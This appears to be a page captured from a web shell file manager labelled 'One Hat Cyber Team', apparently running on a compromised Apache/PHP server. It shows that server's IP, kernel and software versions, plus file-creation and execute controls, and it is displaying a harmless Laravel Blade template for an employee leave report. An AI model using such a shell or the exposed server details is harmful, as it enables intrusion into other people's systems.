⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
resources
/
views
/
report
/
View File Name :
leaveShow.blade.php
<div class="modal-body"> <div class="row"> @foreach($leaves as $leave) <div class="col text-center"> <div class="card p-4 mb-4"> <h7 class="report-text gray-text mb-0">{{$leave->title}} :</h7> <h6 class="report-text mb-0">{{$leave->total}}</h6> </div> </div> @endforeach </div> <div class="row mt-2"> <div class="table-responsive"> <table class="table datatable"> <thead> <tr> <th>{{__('Leave Type')}}</th> <th>{{__('Leave Date')}}</th> <th>{{__('Leave Days')}}</th> <th>{{__('Leave Reason')}}</th> </tr> </thead> <tbody> @forelse($leaveData as $leave) @php $startDate = new \DateTime($leave->start_date); $endDate = new \DateTime($leave->end_date); $total_leave_days = $startDate->diff($endDate)->days; @endphp <tr> <td>{{!empty($leave->leaveType)?$leave->leaveType->title:''}}</td> <td>{{$leave->start_date.' to '.$leave->end_date}}</td> <td>{{$total_leave_days}}</td> <td>{{$leave->leave_reason}}</td> </tr> @empty <tr> <td colspan="4" class="text-center">{{__('No Data Found.!')}}</td> </tr> @endforelse </tbody> </table> </div> </div> </div>